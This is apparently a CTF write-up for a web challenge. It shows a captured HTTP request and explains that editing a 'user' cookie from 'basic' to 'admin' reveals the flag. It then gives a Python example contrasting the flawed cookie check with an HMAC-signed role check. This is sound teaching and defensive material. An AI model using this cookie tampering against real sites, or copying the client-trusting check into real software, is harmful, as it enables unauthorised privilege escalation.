Category
Web
Description
I just started making my new website. Can you pen-test it and see if you can get the super-secret flag?
Solution
When entering the challenge page we get the following message.

Clicking the link we get a message telling us that only admins can get the flag.

Let's take a look at the request.
GET /flag HTTP/2
Host: mhsctf-newsitewhodis.0xmmalik.repl.co
Cookie: user=basic
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://mhsctf-newsitewhodis.0xmmalik.repl.co/
Upgrade-Insecure-Requests: 1
Te: trailers
Here we can see the cookie user with the value basic. Changing the cookie value to admin and resending the request returns the flag, so the server decides who is an admin from a value the client controls.
Hello there, Admin! Here is your super-secret flag: flag{1t$-@_m3_Mari0}
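For the fix side, here is an added example (not the challenge's source code) that puts the flawed check, trusting the raw user cookie, next to a version that only accepts a role the server itself signed with an HMAC. The function names, the role.mac cookie format and the key handling are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-deployment secret that stays on the server.
SECRET_KEY = secrets.token_bytes(32)


def is_admin_weak(cookies):
    """Flawed check: the role is read straight from a client-controlled cookie."""
    return cookies.get("user") == "admin"


def sign_role(role, key=SECRET_KEY):
    """Build the cookie value 'role.hexmac' once the server has authenticated the user."""
    mac = hmac.new(key, role.encode(), hashlib.sha256).hexdigest()
    return f"{role}.{mac}"


def verify_role(value, key=SECRET_KEY):
    """Return the role if its MAC verifies, otherwise None."""
    role, sep, mac = value.rpartition(".")
    if not sep:
        return None  # no signature at all, e.g. a bare "admin"
    expected = hmac.new(key, role.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    if hmac.compare_digest(mac.encode(), expected.encode()):
        return role
    return None


def is_admin_hardened(cookies):
    """Hardened check: only a role the server signed is honoured."""
    return verify_role(cookies.get("user", "")) == "admin"


if __name__ == "__main__":
    # Constructed cookie jars for the demonstration.
    issued = {"user": sign_role("basic")}
    edited = {"user": "admin"}
    spliced = {"user": "admin." + issued["user"].split(".")[1]}
    print("weak, edited cookie:     ", is_admin_weak(edited))
    print("hardened, edited cookie: ", is_admin_hardened(edited))
    print("hardened, spliced cookie:", is_admin_hardened(spliced))
    print("hardened, issued cookie: ", verify_role(issued["user"]))
```

Keeping the role in server-side session state and sending only an opaque session ID removes the role from the cookie entirely, which also makes revocation possible.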